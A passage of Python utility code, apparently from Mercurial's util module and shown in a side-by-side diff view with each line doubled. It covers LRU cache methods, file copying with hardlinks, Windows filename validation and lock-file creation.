1530 self.totalcost -= node.cost
1531 node.markempty()
1531 node.markempty()
1532
1532
1533 # Temporarily mark as newest item before re-adjusting head to make
1533 # Temporarily mark as newest item before re-adjusting head to make
1534 # this node the oldest item.
1534 # this node the oldest item.
1535 self._movetohead(node)
1535 self._movetohead(node)
1536 self._head = node.next
1536 self._head = node.next
1537
1537
1538 return value
1538 return value
1539
1539
1540 # Additional dict methods.
1540 # Additional dict methods.
1541
1541
1542 def get(self, k, default=None):
1542 def get(self, k, default=None):
1543 try:
1543 try:
1544 return self.__getitem__(k)
1544 return self.__getitem__(k)
1545 except KeyError:
1545 except KeyError:
1546 return default
1546 return default
1547
1547
1548 def peek(self, k, default=_notset):
1548 def peek(self, k, default=_notset):
1549 """Get the specified item without moving it to the head
1549 """Get the specified item without moving it to the head
1550
1550
1551 Unlike get(), this doesn't mutate the internal state. But be aware
1551 Unlike get(), this doesn't mutate the internal state. But be aware
1552 that it doesn't mean peek() is thread safe.
1552 that it doesn't mean peek() is thread safe.
1553 """
1553 """
1554 try:
1554 try:
1555 node = self._cache[k]
1555 node = self._cache[k]
1556 return node.value
1556 return node.value
1557 except KeyError:
1557 except KeyError:
1558 if default is _notset:
1558 if default is _notset:
1559 raise
1559 raise
1560 return default
1560 return default
1561
1561
1562 def clear(self):
1562 def clear(self):
1563 n = self._head
1563 n = self._head
1564 while n.key is not _notset:
1564 while n.key is not _notset:
1565 self.totalcost -= n.cost
1565 self.totalcost -= n.cost
1566 n.markempty()
1566 n.markempty()
1567 n = n.next
1567 n = n.next
1568
1568
1569 self._cache.clear()
1569 self._cache.clear()
1570
1570
1571 def copy(self, capacity=None, maxcost=0):
1571 def copy(self, capacity=None, maxcost=0):
1572 """Create a new cache as a copy of the current one.
1572 """Create a new cache as a copy of the current one.
1573
1573
1574 By default, the new cache has the same capacity as the existing one.
1574 By default, the new cache has the same capacity as the existing one.
1575 But, the cache capacity can be changed as part of performing the
1575 But, the cache capacity can be changed as part of performing the
1576 copy.
1576 copy.
1577
1577
1578 Items in the copy have an insertion/access order matching this
1578 Items in the copy have an insertion/access order matching this
1579 instance.
1579 instance.
1580 """
1580 """
1581
1581
1582 capacity = capacity or self.capacity
1582 capacity = capacity or self.capacity
1583 maxcost = maxcost or self.maxcost
1583 maxcost = maxcost or self.maxcost
1584 result = lrucachedict(capacity, maxcost=maxcost)
1584 result = lrucachedict(capacity, maxcost=maxcost)
1585
1585
1586 # We copy entries by iterating in oldest-to-newest order so the copy
1586 # We copy entries by iterating in oldest-to-newest order so the copy
1587 # has the correct ordering.
1587 # has the correct ordering.
1588
1588
1589 # Find the first non-empty entry.
1589 # Find the first non-empty entry.
1590 n = self._head.prev
1590 n = self._head.prev
1591 while n.key is _notset and n is not self._head:
1591 while n.key is _notset and n is not self._head:
1592 n = n.prev
1592 n = n.prev
1593
1593
1594 # We could potentially skip the first N items when decreasing capacity.
1594 # We could potentially skip the first N items when decreasing capacity.
1595 # But let's keep it simple unless it is a performance problem.
1595 # But let's keep it simple unless it is a performance problem.
1596 for i in range(len(self._cache)):
1596 for i in range(len(self._cache)):
1597 result.insert(n.key, n.value, cost=n.cost)
1597 result.insert(n.key, n.value, cost=n.cost)
1598 n = n.prev
1598 n = n.prev
1599
1599
1600 return result
1600 return result
1601
1601
1602 def popoldest(self):
1602 def popoldest(self):
1603 """Remove the oldest item from the cache.
1603 """Remove the oldest item from the cache.
1604
1604
1605 Returns the (key, value) describing the removed cache entry.
1605 Returns the (key, value) describing the removed cache entry.
1606 """
1606 """
1607 if not self._cache:
1607 if not self._cache:
1608 return
1608 return
1609
1609
1610 # Walk the linked list backwards starting at tail node until we hit
1610 # Walk the linked list backwards starting at tail node until we hit
1611 # a non-empty node.
1611 # a non-empty node.
1612 n = self._head.prev
1612 n = self._head.prev
1613 while n.key is _notset:
1613 while n.key is _notset:
1614 n = n.prev
1614 n = n.prev
1615
1615
1616 assert n is not None # help pytype
1616 assert n is not None # help pytype
1617
1617
1618 key, value = n.key, n.value
1618 key, value = n.key, n.value
1619
1619
1620 # And remove it from the cache and mark it as empty.
1620 # And remove it from the cache and mark it as empty.
1621 del self._cache[n.key]
1621 del self._cache[n.key]
1622 self.totalcost -= n.cost
1622 self.totalcost -= n.cost
1623 n.markempty()
1623 n.markempty()
1624
1624
1625 return key, value
1625 return key, value
1626
1626
1627 def _movetohead(self, node):
1627 def _movetohead(self, node):
1628 """Mark a node as the newest, making it the new head.
1628 """Mark a node as the newest, making it the new head.
1629
1629
1630 When a node is accessed, it becomes the freshest entry in the LRU
1630 When a node is accessed, it becomes the freshest entry in the LRU
1631 list, which is denoted by self._head.
1631 list, which is denoted by self._head.
1632
1632
1633 Visually, let's make ``N`` the new head node (* denotes head):
1633 Visually, let's make ``N`` the new head node (* denotes head):
1634
1634
1635 previous/oldest <-> head <-> next/next newest
1635 previous/oldest <-> head <-> next/next newest
1636
1636
1637 ----<->--- A* ---<->-----
1637 ----<->--- A* ---<->-----
1638 | |
1638 | |
1639 E <-> D <-> N <-> C <-> B
1639 E <-> D <-> N <-> C <-> B
1640
1640
1641 To:
1641 To:
1642
1642
1643 ----<->--- N* ---<->-----
1643 ----<->--- N* ---<->-----
1644 | |
1644 | |
1645 E <-> D <-> C <-> B <-> A
1645 E <-> D <-> C <-> B <-> A
1646
1646
1647 This requires the following moves:
1647 This requires the following moves:
1648
1648
1649 C.next = D (node.prev.next = node.next)
1649 C.next = D (node.prev.next = node.next)
1650 D.prev = C (node.next.prev = node.prev)
1650 D.prev = C (node.next.prev = node.prev)
1651 E.next = N (head.prev.next = node)
1651 E.next = N (head.prev.next = node)
1652 N.prev = E (node.prev = head.prev)
1652 N.prev = E (node.prev = head.prev)
1653 N.next = A (node.next = head)
1653 N.next = A (node.next = head)
1654 A.prev = N (head.prev = node)
1654 A.prev = N (head.prev = node)
1655 """
1655 """
1656 head = self._head
1656 head = self._head
1657 # C.next = D
1657 # C.next = D
1658 node.prev.next = node.next
1658 node.prev.next = node.next
1659 # D.prev = C
1659 # D.prev = C
1660 node.next.prev = node.prev
1660 node.next.prev = node.prev
1661 # N.prev = E
1661 # N.prev = E
1662 node.prev = head.prev
1662 node.prev = head.prev
1663 # N.next = A
1663 # N.next = A
1664 # It is tempting to do just "head" here, however if node is
1664 # It is tempting to do just "head" here, however if node is
1665 # adjacent to head, this will do bad things.
1665 # adjacent to head, this will do bad things.
1666 node.next = head.prev.next
1666 node.next = head.prev.next
1667 # E.next = N
1667 # E.next = N
1668 node.next.prev = node
1668 node.next.prev = node
1669 # A.prev = N
1669 # A.prev = N
1670 node.prev.next = node
1670 node.prev.next = node
1671
1671
1672 self._head = node
1672 self._head = node
1673
1673
1674 def _addcapacity(self):
1674 def _addcapacity(self):
1675 """Add a node to the circular linked list.
1675 """Add a node to the circular linked list.
1676
1676
1677 The new node is inserted before the head node.
1677 The new node is inserted before the head node.
1678 """
1678 """
1679 head = self._head
1679 head = self._head
1680 node = _lrucachenode()
1680 node = _lrucachenode()
1681 head.prev.next = node
1681 head.prev.next = node
1682 node.prev = head.prev
1682 node.prev = head.prev
1683 node.next = head
1683 node.next = head
1684 head.prev = node
1684 head.prev = node
1685 self._size += 1
1685 self._size += 1
1686 return node
1686 return node
1687
1687
1688 def _enforcecostlimit(self):
1688 def _enforcecostlimit(self):
1689 # This should run after an insertion. It should only be called if total
1689 # This should run after an insertion. It should only be called if total
1690 # cost limits are being enforced.
1690 # cost limits are being enforced.
1691 # The most recently inserted node is never evicted.
1691 # The most recently inserted node is never evicted.
1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1693 return
1693 return
1694
1694
1695 # This is logically equivalent to calling popoldest() until we
1695 # This is logically equivalent to calling popoldest() until we
1696 # free up enough cost. We don't do that since popoldest() needs
1696 # free up enough cost. We don't do that since popoldest() needs
1697 # to walk the linked list and doing this in a loop would be
1697 # to walk the linked list and doing this in a loop would be
1698 # quadratic. So we find the first non-empty node and then
1698 # quadratic. So we find the first non-empty node and then
1699 # walk nodes until we free up enough capacity.
1699 # walk nodes until we free up enough capacity.
1700 #
1700 #
1701 # If we only removed the minimum number of nodes to free enough
1701 # If we only removed the minimum number of nodes to free enough
1702 # cost at insert time, chances are high that the next insert would
1702 # cost at insert time, chances are high that the next insert would
1703 # also require pruning. This would effectively constitute quadratic
1703 # also require pruning. This would effectively constitute quadratic
1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1705 # target cost that is a percentage of the max cost. This will tend
1705 # target cost that is a percentage of the max cost. This will tend
1706 # to free more nodes when the high water mark is reached, which
1706 # to free more nodes when the high water mark is reached, which
1707 # lowers the chances of needing to prune on the subsequent insert.
1707 # lowers the chances of needing to prune on the subsequent insert.
1708 targetcost = int(self.maxcost * 0.75)
1708 targetcost = int(self.maxcost * 0.75)
1709
1709
1710 n = self._head.prev
1710 n = self._head.prev
1711 while n.key is _notset:
1711 while n.key is _notset:
1712 n = n.prev
1712 n = n.prev
1713
1713
1714 while len(self) > 1 and self.totalcost > targetcost:
1714 while len(self) > 1 and self.totalcost > targetcost:
1715 del self._cache[n.key]
1715 del self._cache[n.key]
1716 self.totalcost -= n.cost
1716 self.totalcost -= n.cost
1717 n.markempty()
1717 n.markempty()
1718 n = n.prev
1718 n = n.prev
1719
1719
1720
1720
1721 def lrucachefunc(func):
1721 def lrucachefunc(func):
1722 '''cache most recent results of function calls'''
1722 '''cache most recent results of function calls'''
1723 cache = {}
1723 cache = {}
1724 order = collections.deque()
1724 order = collections.deque()
1725 if func.__code__.co_argcount == 1:
1725 if func.__code__.co_argcount == 1:
1726
1726
1727 def f(arg):
1727 def f(arg):
1728 if arg not in cache:
1728 if arg not in cache:
1729 if len(cache) > 20:
1729 if len(cache) > 20:
1730 del cache[order.popleft()]
1730 del cache[order.popleft()]
1731 cache[arg] = func(arg)
1731 cache[arg] = func(arg)
1732 else:
1732 else:
1733 order.remove(arg)
1733 order.remove(arg)
1734 order.append(arg)
1734 order.append(arg)
1735 return cache[arg]
1735 return cache[arg]
1736
1736
1737 else:
1737 else:
1738
1738
1739 def f(*args):
1739 def f(*args):
1740 if args not in cache:
1740 if args not in cache:
1741 if len(cache) > 20:
1741 if len(cache) > 20:
1742 del cache[order.popleft()]
1742 del cache[order.popleft()]
1743 cache[args] = func(*args)
1743 cache[args] = func(*args)
1744 else:
1744 else:
1745 order.remove(args)
1745 order.remove(args)
1746 order.append(args)
1746 order.append(args)
1747 return cache[args]
1747 return cache[args]
1748
1748
1749 return f
1749 return f
1750
1750
1751
1751
1752 class propertycache(object):
1752 class propertycache(object):
1753 def __init__(self, func):
1753 def __init__(self, func):
1754 self.func = func
1754 self.func = func
1755 self.name = func.__name__
1755 self.name = func.__name__
1756
1756
1757 def __get__(self, obj, type=None):
1757 def __get__(self, obj, type=None):
1758 result = self.func(obj)
1758 result = self.func(obj)
1759 self.cachevalue(obj, result)
1759 self.cachevalue(obj, result)
1760 return result
1760 return result
1761
1761
1762 def cachevalue(self, obj, value):
1762 def cachevalue(self, obj, value):
1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1764 obj.__dict__[self.name] = value
1764 obj.__dict__[self.name] = value
1765
1765
1766
1766
1767 def clearcachedproperty(obj, prop):
1767 def clearcachedproperty(obj, prop):
1768 '''clear a cached property value, if one has been set'''
1768 '''clear a cached property value, if one has been set'''
1769 prop = pycompat.sysstr(prop)
1769 prop = pycompat.sysstr(prop)
1770 if prop in obj.__dict__:
1770 if prop in obj.__dict__:
1771 del obj.__dict__[prop]
1771 del obj.__dict__[prop]
1772
1772
1773
1773
1774 def increasingchunks(source, min=1024, max=65536):
1774 def increasingchunks(source, min=1024, max=65536):
1775 """return no less than min bytes per chunk while data remains,
1775 """return no less than min bytes per chunk while data remains,
1776 doubling min after each chunk until it reaches max"""
1776 doubling min after each chunk until it reaches max"""
1777
1777
1778 def log2(x):
1778 def log2(x):
1779 if not x:
1779 if not x:
1780 return 0
1780 return 0
1781 i = 0
1781 i = 0
1782 while x:
1782 while x:
1783 x >>= 1
1783 x >>= 1
1784 i += 1
1784 i += 1
1785 return i - 1
1785 return i - 1
1786
1786
1787 buf = []
1787 buf = []
1788 blen = 0
1788 blen = 0
1789 for chunk in source:
1789 for chunk in source:
1790 buf.append(chunk)
1790 buf.append(chunk)
1791 blen += len(chunk)
1791 blen += len(chunk)
1792 if blen >= min:
1792 if blen >= min:
1793 if min < max:
1793 if min < max:
1794 min = min << 1
1794 min = min << 1
1795 nmin = 1 << log2(blen)
1795 nmin = 1 << log2(blen)
1796 if nmin > min:
1796 if nmin > min:
1797 min = nmin
1797 min = nmin
1798 if min > max:
1798 if min > max:
1799 min = max
1799 min = max
1800 yield b''.join(buf)
1800 yield b''.join(buf)
1801 blen = 0
1801 blen = 0
1802 buf = []
1802 buf = []
1803 if buf:
1803 if buf:
1804 yield b''.join(buf)
1804 yield b''.join(buf)
1805
1805
1806
1806
1807 def always(fn):
1807 def always(fn):
1808 return True
1808 return True
1809
1809
1810
1810
1811 def never(fn):
1811 def never(fn):
1812 return False
1812 return False
1813
1813
1814
1814
1815 def nogc(func):
1815 def nogc(func):
1816 """disable garbage collector
1816 """disable garbage collector
1817
1817
1818 Python's garbage collector triggers a GC each time a certain number of
1818 Python's garbage collector triggers a GC each time a certain number of
1819 container objects (the number being defined by gc.get_threshold()) are
1819 container objects (the number being defined by gc.get_threshold()) are
1820 allocated even when marked not to be tracked by the collector. Tracking has
1820 allocated even when marked not to be tracked by the collector. Tracking has
1821 no effect on when GCs are triggered, only on what objects the GC looks
1821 no effect on when GCs are triggered, only on what objects the GC looks
1822 into. As a workaround, disable GC while building complex (huge)
1822 into. As a workaround, disable GC while building complex (huge)
1823 containers.
1823 containers.
1824
1824
1825 This garbage collector issue have been fixed in 2.7. But it still affect
1825 This garbage collector issue have been fixed in 2.7. But it still affect
1826 CPython's performance.
1826 CPython's performance.
1827 """
1827 """
1828
1828
1829 def wrapper(*args, **kwargs):
1829 def wrapper(*args, **kwargs):
1830 gcenabled = gc.isenabled()
1830 gcenabled = gc.isenabled()
1831 gc.disable()
1831 gc.disable()
1832 try:
1832 try:
1833 return func(*args, **kwargs)
1833 return func(*args, **kwargs)
1834 finally:
1834 finally:
1835 if gcenabled:
1835 if gcenabled:
1836 gc.enable()
1836 gc.enable()
1837
1837
1838 return wrapper
1838 return wrapper
1839
1839
1840
1840
1841 if pycompat.ispypy:
1841 if pycompat.ispypy:
1842 # PyPy runs slower with gc disabled
1842 # PyPy runs slower with gc disabled
1843 nogc = lambda x: x
1843 nogc = lambda x: x
1844
1844
1845
1845
1846 def pathto(root, n1, n2):
1846 def pathto(root, n1, n2):
1847 # type: (bytes, bytes, bytes) -> bytes
1847 # type: (bytes, bytes, bytes) -> bytes
1848 """return the relative path from one place to another.
1848 """return the relative path from one place to another.
1849 root should use os.sep to separate directories
1849 root should use os.sep to separate directories
1850 n1 should use os.sep to separate directories
1850 n1 should use os.sep to separate directories
1851 n2 should use "/" to separate directories
1851 n2 should use "/" to separate directories
1852 returns an os.sep-separated path.
1852 returns an os.sep-separated path.
1853
1853
1854 If n1 is a relative path, it's assumed it's
1854 If n1 is a relative path, it's assumed it's
1855 relative to root.
1855 relative to root.
1856 n2 should always be relative to root.
1856 n2 should always be relative to root.
1857 """
1857 """
1858 if not n1:
1858 if not n1:
1859 return localpath(n2)
1859 return localpath(n2)
1860 if os.path.isabs(n1):
1860 if os.path.isabs(n1):
1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1862 return os.path.join(root, localpath(n2))
1862 return os.path.join(root, localpath(n2))
1863 n2 = b'/'.join((pconvert(root), n2))
1863 n2 = b'/'.join((pconvert(root), n2))
1864 a, b = splitpath(n1), n2.split(b'/')
1864 a, b = splitpath(n1), n2.split(b'/')
1865 a.reverse()
1865 a.reverse()
1866 b.reverse()
1866 b.reverse()
1867 while a and b and a[-1] == b[-1]:
1867 while a and b and a[-1] == b[-1]:
1868 a.pop()
1868 a.pop()
1869 b.pop()
1869 b.pop()
1870 b.reverse()
1870 b.reverse()
1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1872
1872
1873
1873
1874 def checksignature(func, depth=1):
1874 def checksignature(func, depth=1):
1875 '''wrap a function with code to check for calling errors'''
1875 '''wrap a function with code to check for calling errors'''
1876
1876
1877 def check(*args, **kwargs):
1877 def check(*args, **kwargs):
1878 try:
1878 try:
1879 return func(*args, **kwargs)
1879 return func(*args, **kwargs)
1880 except TypeError:
1880 except TypeError:
1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1882 raise error.SignatureError
1882 raise error.SignatureError
1883 raise
1883 raise
1884
1884
1885 return check
1885 return check
1886
1886
1887
1887
1888 # a whilelist of known filesystems where hardlink works reliably
1888 # a whilelist of known filesystems where hardlink works reliably
1889 _hardlinkfswhitelist = {
1889 _hardlinkfswhitelist = {
1890 b'apfs',
1890 b'apfs',
1891 b'btrfs',
1891 b'btrfs',
1892 b'ext2',
1892 b'ext2',
1893 b'ext3',
1893 b'ext3',
1894 b'ext4',
1894 b'ext4',
1895 b'hfs',
1895 b'hfs',
1896 b'jfs',
1896 b'jfs',
1897 b'NTFS',
1897 b'NTFS',
1898 b'reiserfs',
1898 b'reiserfs',
1899 b'tmpfs',
1899 b'tmpfs',
1900 b'ufs',
1900 b'ufs',
1901 b'xfs',
1901 b'xfs',
1902 b'zfs',
1902 b'zfs',
1903 }
1903 }
1904
1904
1905
1905
1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1907 """copy a file, preserving mode and optionally other stat info like
1907 """copy a file, preserving mode and optionally other stat info like
1908 atime/mtime
1908 atime/mtime
1909
1909
1910 checkambig argument is used with filestat, and is useful only if
1910 checkambig argument is used with filestat, and is useful only if
1911 destination file is guarded by any lock (e.g. repo.lock or
1911 destination file is guarded by any lock (e.g. repo.lock or
1912 repo.wlock).
1912 repo.wlock).
1913
1913
1914 copystat and checkambig should be exclusive.
1914 copystat and checkambig should be exclusive.
1915 """
1915 """
1916 assert not (copystat and checkambig)
1916 assert not (copystat and checkambig)
1917 oldstat = None
1917 oldstat = None
1918 if os.path.lexists(dest):
1918 if os.path.lexists(dest):
1919 if checkambig:
1919 if checkambig:
1920 oldstat = checkambig and filestat.frompath(dest)
1920 oldstat = checkambig and filestat.frompath(dest)
1921 unlink(dest)
1921 unlink(dest)
1922 if hardlink:
1922 if hardlink:
1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1924 # unless we are confident that dest is on a whitelisted filesystem.
1924 # unless we are confident that dest is on a whitelisted filesystem.
1925 try:
1925 try:
1926 fstype = getfstype(os.path.dirname(dest))
1926 fstype = getfstype(os.path.dirname(dest))
1927 except OSError:
1927 except OSError:
1928 fstype = None
1928 fstype = None
1929 if fstype not in _hardlinkfswhitelist:
1929 if fstype not in _hardlinkfswhitelist:
1930 hardlink = False
1930 hardlink = False
1931 if hardlink:
1931 if hardlink:
1932 try:
1932 try:
1933 oslink(src, dest)
1933 oslink(src, dest)
1934 return
1934 return
1935 except (IOError, OSError):
1935 except (IOError, OSError):
1936 pass # fall back to normal copy
1936 pass # fall back to normal copy
1937 if os.path.islink(src):
1937 if os.path.islink(src):
1938 os.symlink(os.readlink(src), dest)
1938 os.symlink(os.readlink(src), dest)
1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1940 # for them anyway
1940 # for them anyway
1941 else:
1941 else:
1942 try:
1942 try:
1943 shutil.copyfile(src, dest)
1943 shutil.copyfile(src, dest)
1944 if copystat:
1944 if copystat:
1945 # copystat also copies mode
1945 # copystat also copies mode
1946 shutil.copystat(src, dest)
1946 shutil.copystat(src, dest)
1947 else:
1947 else:
1948 shutil.copymode(src, dest)
1948 shutil.copymode(src, dest)
1949 if oldstat and oldstat.stat:
1949 if oldstat and oldstat.stat:
1950 newstat = filestat.frompath(dest)
1950 newstat = filestat.frompath(dest)
1951 if newstat.isambig(oldstat):
1951 if newstat.isambig(oldstat):
1952 # stat of copied file is ambiguous to original one
1952 # stat of copied file is ambiguous to original one
1953 advanced = (
1953 advanced = (
1954 oldstat.stat[stat.ST_MTIME] + 1
1954 oldstat.stat[stat.ST_MTIME] + 1
1955 ) & 0x7FFFFFFF
1955 ) & 0x7FFFFFFF
1956 os.utime(dest, (advanced, advanced))
1956 os.utime(dest, (advanced, advanced))
1957 except shutil.Error as inst:
1957 except shutil.Error as inst:
1958 raise error.Abort(stringutil.forcebytestr(inst))
1958 raise error.Abort(stringutil.forcebytestr(inst))
1959
1959
1960
1960
1961 def copyfiles(src, dst, hardlink=None, progress=None):
1961 def copyfiles(src, dst, hardlink=None, progress=None):
1962 """Copy a directory tree using hardlinks if possible."""
1962 """Copy a directory tree using hardlinks if possible."""
1963 num = 0
1963 num = 0
1964
1964
1965 def settopic():
1965 def settopic():
1966 if progress:
1966 if progress:
1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1968
1968
1969 if os.path.isdir(src):
1969 if os.path.isdir(src):
1970 if hardlink is None:
1970 if hardlink is None:
1971 hardlink = (
1971 hardlink = (
1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1973 )
1973 )
1974 settopic()
1974 settopic()
1975 os.mkdir(dst)
1975 os.mkdir(dst)
1976 for name, kind in listdir(src):
1976 for name, kind in listdir(src):
1977 srcname = os.path.join(src, name)
1977 srcname = os.path.join(src, name)
1978 dstname = os.path.join(dst, name)
1978 dstname = os.path.join(dst, name)
1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1980 num += n
1980 num += n
1981 else:
1981 else:
1982 if hardlink is None:
1982 if hardlink is None:
1983 hardlink = (
1983 hardlink = (
1984 os.stat(os.path.dirname(src)).st_dev
1984 os.stat(os.path.dirname(src)).st_dev
1985 == os.stat(os.path.dirname(dst)).st_dev
1985 == os.stat(os.path.dirname(dst)).st_dev
1986 )
1986 )
1987 settopic()
1987 settopic()
1988
1988
1989 if hardlink:
1989 if hardlink:
1990 try:
1990 try:
1991 oslink(src, dst)
1991 oslink(src, dst)
1992 except (IOError, OSError):
1992 except (IOError, OSError):
1993 hardlink = False
1993 hardlink = False
1994 shutil.copy(src, dst)
1994 shutil.copy(src, dst)
1995 else:
1995 else:
1996 shutil.copy(src, dst)
1996 shutil.copy(src, dst)
1997 num += 1
1997 num += 1
1998 if progress:
1998 if progress:
1999 progress.increment()
1999 progress.increment()
2000
2000
2001 return hardlink, num
2001 return hardlink, num
2002
2002
2003
2003
2004 _winreservednames = {
2004 _winreservednames = {
2005 b'con',
2005 b'con',
2006 b'prn',
2006 b'prn',
2007 b'aux',
2007 b'aux',
2008 b'nul',
2008 b'nul',
2009 b'com1',
2009 b'com1',
2010 b'com2',
2010 b'com2',
2011 b'com3',
2011 b'com3',
2012 b'com4',
2012 b'com4',
2013 b'com5',
2013 b'com5',
2014 b'com6',
2014 b'com6',
2015 b'com7',
2015 b'com7',
2016 b'com8',
2016 b'com8',
2017 b'com9',
2017 b'com9',
2018 b'lpt1',
2018 b'lpt1',
2019 b'lpt2',
2019 b'lpt2',
2020 b'lpt3',
2020 b'lpt3',
2021 b'lpt4',
2021 b'lpt4',
2022 b'lpt5',
2022 b'lpt5',
2023 b'lpt6',
2023 b'lpt6',
2024 b'lpt7',
2024 b'lpt7',
2025 b'lpt8',
2025 b'lpt8',
2026 b'lpt9',
2026 b'lpt9',
2027 }
2027 }
2028 _winreservedchars = b':*?"<>|'
2028 _winreservedchars = b':*?"<>|'
2029
2029
2030
2030
2031 def checkwinfilename(path):
2031 def checkwinfilename(path):
2032 # type: (bytes) -> Optional[bytes]
2032 # type: (bytes) -> Optional[bytes]
2033 r"""Check that the base-relative path is a valid filename on Windows.
2033 r"""Check that the base-relative path is a valid filename on Windows.
2034 Returns None if the path is ok, or a UI string describing the problem.
2034 Returns None if the path is ok, or a UI string describing the problem.
2035
2035
2036 >>> checkwinfilename(b"just/a/normal/path")
2036 >>> checkwinfilename(b"just/a/normal/path")
2037 >>> checkwinfilename(b"foo/bar/con.xml")
2037 >>> checkwinfilename(b"foo/bar/con.xml")
2038 "filename contains 'con', which is reserved on Windows"
2038 "filename contains 'con', which is reserved on Windows"
2039 >>> checkwinfilename(b"foo/con.xml/bar")
2039 >>> checkwinfilename(b"foo/con.xml/bar")
2040 "filename contains 'con', which is reserved on Windows"
2040 "filename contains 'con', which is reserved on Windows"
2041 >>> checkwinfilename(b"foo/bar/xml.con")
2041 >>> checkwinfilename(b"foo/bar/xml.con")
2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2043 "filename contains 'AUX', which is reserved on Windows"
2043 "filename contains 'AUX', which is reserved on Windows"
2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2045 "filename contains ':', which is reserved on Windows"
2045 "filename contains ':', which is reserved on Windows"
2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2047 "filename contains '\\x07', which is invalid on Windows"
2047 "filename contains '\\x07', which is invalid on Windows"
2048 >>> checkwinfilename(b"foo/bar/bla ")
2048 >>> checkwinfilename(b"foo/bar/bla ")
2049 "filename ends with ' ', which is not allowed on Windows"
2049 "filename ends with ' ', which is not allowed on Windows"
2050 >>> checkwinfilename(b"../bar")
2050 >>> checkwinfilename(b"../bar")
2051 >>> checkwinfilename(b"foo\\")
2051 >>> checkwinfilename(b"foo\\")
2052 "filename ends with '\\', which is invalid on Windows"
2052 "filename ends with '\\', which is invalid on Windows"
2053 >>> checkwinfilename(b"foo\\/bar")
2053 >>> checkwinfilename(b"foo\\/bar")
2054 "directory name ends with '\\', which is invalid on Windows"
2054 "directory name ends with '\\', which is invalid on Windows"
2055 """
2055 """
2056 if path.endswith(b'\\'):
2056 if path.endswith(b'\\'):
2057 return _(b"filename ends with '\\', which is invalid on Windows")
2057 return _(b"filename ends with '\\', which is invalid on Windows")
2058 if b'\\/' in path:
2058 if b'\\/' in path:
2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2060 for n in path.replace(b'\\', b'/').split(b'/'):
2060 for n in path.replace(b'\\', b'/').split(b'/'):
2061 if not n:
2061 if not n:
2062 continue
2062 continue
2063 for c in _filenamebytestr(n):
2063 for c in _filenamebytestr(n):
2064 if c in _winreservedchars:
2064 if c in _winreservedchars:
2065 return (
2065 return (
2066 _(
2066 _(
2067 b"filename contains '%s', which is reserved "
2067 b"filename contains '%s', which is reserved "
2068 b"on Windows"
2068 b"on Windows"
2069 )
2069 )
2070 % c
2070 % c
2071 )
2071 )
2072 if ord(c) <= 31:
2072 if ord(c) <= 31:
2073 return _(
2073 return _(
2074 b"filename contains '%s', which is invalid on Windows"
2074 b"filename contains '%s', which is invalid on Windows"
2075 ) % stringutil.escapestr(c)
2075 ) % stringutil.escapestr(c)
2076 base = n.split(b'.')[0]
2076 base = n.split(b'.')[0]
2077 if base and base.lower() in _winreservednames:
2077 if base and base.lower() in _winreservednames:
2078 return (
2078 return (
2079 _(b"filename contains '%s', which is reserved on Windows")
2079 _(b"filename contains '%s', which is reserved on Windows")
2080 % base
2080 % base
2081 )
2081 )
2082 t = n[-1:]
2082 t = n[-1:]
2083 if t in b'. ' and n not in b'..':
2083 if t in b'. ' and n not in b'..':
2084 return (
2084 return (
2085 _(
2085 _(
2086 b"filename ends with '%s', which is not allowed "
2086 b"filename ends with '%s', which is not allowed "
2087 b"on Windows"
2087 b"on Windows"
2088 )
2088 )
2089 % t
2089 % t
2090 )
2090 )
2091
2091
2092
2092
2093 timer = getattr(time, "perf_counter", None)
2093 timer = getattr(time, "perf_counter", None)
2094
2094
2095 if pycompat.iswindows:
2095 if pycompat.iswindows:
2096 checkosfilename = checkwinfilename
2096 checkosfilename = checkwinfilename
2097 if not timer:
2097 if not timer:
2098 timer = time.clock
2098 timer = time.clock
2099 else:
2099 else:
2100 # mercurial.windows doesn't have platform.checkosfilename
2100 # mercurial.windows doesn't have platform.checkosfilename
2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2102 if not timer:
2102 if not timer:
2103 timer = time.time
2103 timer = time.time
2104
2104
2105
2105
2106 def makelock(info, pathname):
2106 def makelock(info, pathname):
2107 """Create a lock file atomically if possible
2107 """Create a lock file atomically if possible
2108
2108
2109 This may leave a stale lock file if symlink isn't supported and signal
2109 This may leave a stale lock file if symlink isn't supported and signal
2110 interrupt is enabled.
2110 interrupt is enabled.
2111 """
2111 """
2112 try:
2112 try:
2113 return os.symlink(info, pathname)
2113 return os.symlink(info, pathname)
2114 except OSError as why:
2114 except OSError as why:
2115 if why.errno == errno.EEXIST:
2115 if why.errno == errno.EEXIST:
2116 raise
2116 raise
2117 except AttributeError: # no symlink in os
